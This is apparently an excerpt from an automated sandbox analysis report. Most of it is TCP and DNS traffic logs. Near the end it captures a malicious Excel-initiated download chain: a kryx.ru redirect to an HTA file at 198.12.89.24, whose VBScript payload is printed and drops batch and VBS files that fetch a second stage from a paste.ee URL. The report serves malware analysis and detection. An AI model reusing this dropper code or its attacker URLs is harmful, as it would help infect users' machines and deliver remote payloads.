                            Mar 17, 2025 09:29:24.395811081 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.395857096 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.395863056 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.395905018 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.396425009 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.396440029 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.396554947 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.396554947 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.396563053 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.396574020 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.396593094 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.396609068 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.396642923 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.396648884 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.396859884 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.397025108 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.397041082 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.397099972 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.397108078 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.397164106 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.397474051 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.397489071 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.397536039 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.397553921 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.397593975 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.397859097 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.397877932 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.397926092 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.397934914 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.397965908 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.397984982 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.485901117 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.485918999 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.485960007 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.485974073 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.485995054 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.486016035 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.486100912 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.486120939 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.486151934 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.486155987 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.486186981 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.486202955 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.486392021 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.486407042 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.486437082 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.486440897 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.486485958 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.486485958 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.486764908 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.486780882 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.486814976 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.486819029 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.486918926 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.487128019 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.487143993 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.487181902 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.487185955 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.487200022 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.487220049 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.487308025 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.487323046 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.487365007 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.487369061 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.487394094 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.487409115 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.487643957 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.487658978 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.487694979 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.487699032 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.487746954 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.487974882 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.487988949 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.488018990 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.488023043 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.488050938 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.576492071 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.576514959 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.576564074 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.576576948 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.576602936 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.576620102 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.576674938 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.576690912 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.576723099 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.576726913 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.576764107 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.576781988 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.577032089 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.577049017 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.577102900 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.577112913 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.577220917 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.577377081 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.577390909 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.577435017 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.577438116 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.577471972 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.577682972 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.577701092 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.577739954 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.577744961 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.577788115 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.577971935 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.577989101 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.578032017 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.578035116 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.578059912 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.578073978 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.578201056 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.578214884 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.578260899 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.578264952 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.578293085 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.578421116 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.578437090 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.578478098 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.578483105 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.578527927 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.667059898 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.667078972 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.667135000 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.667144060 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.667171001 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.667290926 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.667314053 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.667351007 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.667357922 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.667388916 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.667403936 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.667588949 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.667606115 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.667632103 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.667638063 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.667659044 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.667674065 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.667860985 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.667882919 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.667913914 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.667918921 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.667946100 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.667958975 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.668154955 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.668171883 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.668205023 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.668210030 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.668231964 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.668246984 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.668428898 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.668443918 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.668476105 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.668479919 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.668503046 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.668517113 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.668680906 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.668697119 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.668724060 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.668728113 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.668761015 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.668775082 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.669003963 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.669018984 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.669066906 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.669070959 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.669087887 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.669101954 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.757648945 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.757667065 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.757724047 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.757744074 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.757797003 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.757972002 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.757987976 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.758035898 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.758042097 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.758061886 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.758095026 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.758184910 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.758199930 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.758259058 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.758264065 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.758409023 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.758513927 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.758528948 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.758575916 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.758582115 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.758685112 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.758701086 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.758716106 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.758761883 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.758766890 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.758867979 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.758943081 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.758958101 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.758991003 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.759006023 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.759010077 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.759047985 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.759053946 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.759177923 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.759195089 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:24.759213924 CET49701443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:24.759224892 CET4434970113.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:29.853877068 CET49703443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:29.853915930 CET4434970313.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:29.853976011 CET49703443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:29.880198956 CET49704443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:29.880270004 CET4434970413.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:29.880333900 CET49704443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:29.881174088 CET49703443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:29.881189108 CET4434970313.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:29.884495974 CET49704443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:29.884525061 CET4434970413.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:30.559741020 CET4434970413.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:30.560174942 CET4434970313.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:30.560220957 CET49704443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:30.560271025 CET4434970413.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:30.560705900 CET49703443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:30.560719967 CET4434970313.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:30.561114073 CET49704443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:30.561129093 CET4434970413.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:30.561817884 CET49703443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:30.561822891 CET4434970313.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:30.670190096 CET4434970313.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:30.670212030 CET4434970313.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:30.670269012 CET49703443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:30.670288086 CET4434970313.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:30.670522928 CET49703443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:30.670522928 CET49703443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:30.670531988 CET4434970313.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:30.670540094 CET4434970313.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:30.670591116 CET4434970313.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:30.672277927 CET4434970413.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:30.672343016 CET4434970413.107.246.60192.168.2.7
                            Mar 17, 2025 09:29:30.672951937 CET49704443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:30.672952890 CET49704443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:30.672952890 CET49704443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:30.979197025 CET49704443192.168.2.713.107.246.60
                            Mar 17, 2025 09:29:30.979238987 CET4434970413.107.246.60192.168.2.7
                            Mar 17, 2025 09:30:06.281125069 CET4969880192.168.2.7198.12.89.24
                            Mar 17, 2025 09:30:06.285878897 CET8049698198.12.89.24192.168.2.7
                            TimestampSource PortDest PortSource IPDest IP
                            Mar 17, 2025 09:29:07.261583090 CET6306353192.168.2.71.1.1.1
                            Mar 17, 2025 09:29:07.354336023 CET53630631.1.1.1192.168.2.7
                            Mar 17, 2025 09:29:22.696779013 CET5036553192.168.2.71.1.1.1
                            Mar 17, 2025 09:29:22.834953070 CET53503651.1.1.1192.168.2.7

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Mar 17, 2025 09:29:07.261583090 CET192.168.2.71.1.1.10x85e6Standard query (0)kryx.ruA (IP address)IN (0x0001)false
                            Mar 17, 2025 09:29:22.696779013 CET192.168.2.71.1.1.10x6876Standard query (0)otelrules.svc.static.microsoftA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Mar 17, 2025 09:28:18.209204912 CET1.1.1.1192.168.2.70x254aNo error (0)ecs-office.s-0005.dual-s-msedge.netshed.s-0005.dual-s-dc-msedge.netCNAME (Canonical name)IN (0x0001)false
                            Mar 17, 2025 09:28:18.209204912 CET1.1.1.1192.168.2.70x254aNo error (0)shed.s-0005.dual-s-dc-msedge.nets-0005.dual-s-dc-msedge.netCNAME (Canonical name)IN (0x0001)false
                            Mar 17, 2025 09:28:18.209204912 CET1.1.1.1192.168.2.70x254aNo error (0)s-0005.dual-s-dc-msedge.net52.123.130.14A (IP address)IN (0x0001)false
                            Mar 17, 2025 09:28:18.209204912 CET1.1.1.1192.168.2.70x254aNo error (0)s-0005.dual-s-dc-msedge.net52.123.131.14A (IP address)IN (0x0001)false
                            Mar 17, 2025 09:28:20.020064116 CET1.1.1.1192.168.2.70xa641No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.34A (IP address)IN (0x0001)false
                            Mar 17, 2025 09:28:20.020064116 CET1.1.1.1192.168.2.70xa641No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.35A (IP address)IN (0x0001)false
                            Mar 17, 2025 09:28:20.020064116 CET1.1.1.1192.168.2.70xa641No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.23A (IP address)IN (0x0001)false
                            Mar 17, 2025 09:28:20.020064116 CET1.1.1.1192.168.2.70xa641No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.20A (IP address)IN (0x0001)false
                            Mar 17, 2025 09:28:20.020064116 CET1.1.1.1192.168.2.70xa641No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.36A (IP address)IN (0x0001)false
                            Mar 17, 2025 09:28:20.020064116 CET1.1.1.1192.168.2.70xa641No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.19A (IP address)IN (0x0001)false
                            Mar 17, 2025 09:28:20.020064116 CET1.1.1.1192.168.2.70xa641No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.39A (IP address)IN (0x0001)false
                            Mar 17, 2025 09:29:07.354336023 CET1.1.1.1192.168.2.70x85e6No error (0)kryx.ru188.225.72.170A (IP address)IN (0x0001)false
                            Mar 17, 2025 09:29:22.834953070 CET1.1.1.1192.168.2.70x6876No error (0)otelrules.svc.static.microsoftotelrules-bzhndjfje8dvh5fd.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                            Mar 17, 2025 09:29:22.834953070 CET1.1.1.1192.168.2.70x6876No error (0)otelrules-bzhndjfje8dvh5fd.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                            Mar 17, 2025 09:29:22.834953070 CET1.1.1.1192.168.2.70x6876No error (0)star-azurefd-prod.trafficmanager.netshed.dual-low.s-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                            Mar 17, 2025 09:29:22.834953070 CET1.1.1.1192.168.2.70x6876No error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                            Mar 17, 2025 09:29:22.834953070 CET1.1.1.1192.168.2.70x6876No error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • kryx.ru
                            • otelrules.svc.static.microsoft
                            • 198.12.89.24

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.749698198.12.89.24806784C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            TimestampBytes transferredDirectionData
                            Mar 17, 2025 09:29:08.369787931 CET265OUTGET /xampp/angel/tsgreatnessforentiretimegoodgirlsheis.hta?&balinese=stereotyped HTTP/1.1
                            Accept: */*
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Connection: Keep-Alive
                            Host: 198.12.89.24
                            Mar 17, 2025 09:29:08.853543997 CET1236INHTTP/1.1 200 OK
                            Date: Mon, 17 Mar 2025 08:29:08 GMT
                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                            Last-Modified: Mon, 17 Mar 2025 06:44:13 GMT
                            ETag: "768-630841dcba22f"
                            Accept-Ranges: bytes
                            Content-Length: 1896
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: application/hta
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 78 65 63 75 74 61 72 20 53 63 72 69 70 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 48 54 41 3a 41 50 50 4c 49 43 41 54 49 4f 4e 20 0d 0a 20 20 20 20 20 20 20 20 41 50 50 4c 49 43 41 54 49 4f 4e 4e 41 4d 45 3d 22 53 63 72 69 70 74 45 78 65 63 75 74 6f 72 22 0d 0a 20 20 20 20 20 20 20 20 42 4f 52 44 45 52 3d 22 6e 6f 6e 65 22 0d 0a 20 20 20 20 20 20 20 20 43 41 50 54 49 4f 4e 3d 22 6e 6f 22 0d 0a 20 20 20 20 20 20 20 20 53 48 4f 57 49 4e 54 41 53 4b 42 41 52 3d 22 6e 6f 22 0d 0a 20 20 20 20 20 20 20 20 53 49 4e 47 4c 45 49 4e 53 54 41 4e 43 45 3d 22 79 65 73 22 0d 0a 20 20 20 20 20 20 20 20 57 49 4e 44 4f 57 53 54 41 54 45 3d 22 6d 69 6e 69 6d 69 7a 65 22 0d 0a 20 20 20 20 2f 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 56 42 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 44 69 6d 20 72 69 6e 67 62 65 61 72 65 72 0d 0a 20 20 20 [TRUNCATED]
                            Data Ascii: <!DOCTYPE html><html><head> <title>Executar Script</title> <HTA:APPLICATION APPLICATIONNAME="ScriptExecutor" BORDER="none" CAPTION="no" SHOWINTASKBAR="no" SINGLEINSTANCE="yes" WINDOWSTATE="minimize" /> <script language="VBScript"> Dim ringbearer Set ringbearer = CreateObject("WScript.Shell") Dim connivances connivances = "C:\Windows\Temp\twelth.bat" Dim mythopoets, roenoke Set mythopoets = CreateObject("Scripting.FileSystemObject") Set roenoke = mythopoets.CreateTextFile(connivances, True) roenoke.WriteLine "@echo off" roenoke.WriteLine "setlocal" roenoke.WriteLine "set ""fugues=C:\Windows\Temp\complimenter.vbs""" roenoke.WriteLine ">" & """%fugues%""" & " (" roenoke.WriteLine " echo Dim non
                            Mar 17, 2025 09:29:08.853570938 CET976INData Raw: 63 61 74 61 6c 6f 67 2c 20 64 6f 63 75 6d 65 6e 74 61 72 69 73 74 22 0d 0a 20 20 20 20 20 20 20 20 72 6f 65 6e 6f 6b 65 2e 57 72 69 74 65 4c 69 6e 65 20 22 20 20 20 20 65 63 68 6f 20 6e 6f 6e 63 61 74 61 6c 6f 67 20 3d 20 22 22 68 74 74 70 73 3a
                            Data Ascii: catalog, documentarist" roenoke.WriteLine " echo noncatalog = ""https://paste.ee/d/N6drHLKy/0""" roenoke.WriteLine " echo Set documentarist = CreateObject^(""MSXML2.XMLHTTP""^)" roenoke.WriteLine " echo docu


                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.749697188.225.72.1704436784C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            TimestampBytes transferredDirectionData
                            2025-03-17 08:29:08 UTC232OUTGET /e3EPl0?&certification=exclusive&kitty=thinkable HTTP/1.1
                            Accept: */*
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Host: kryx.ru
                            Connection: Keep-Alive
                            2025-03-17 08:29:08 UTC508INHTTP/1.1 302 Found
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Mon, 17 Mar 2025 08:29:08 GMT
                            Content-Type: text/plain; charset=utf-8
                            Content-Length: 117
                            Connection: close
                            X-DNS-Prefetch-Control: off
                            X-Frame-Options: SAMEORIGIN
                            Strict-Transport-Security: max-age=15552000; includeSubDomains
                            X-Download-Options: noopen
                            X-Content-Type-Options: nosniff
                            X-XSS-Protection: 1; mode=block
                            Location: http://198.12.89.24/xampp/angel/tsgreatnessforentiretimegoodgirlsheis.hta?&balinese=stereotyped
                            Vary: Accept
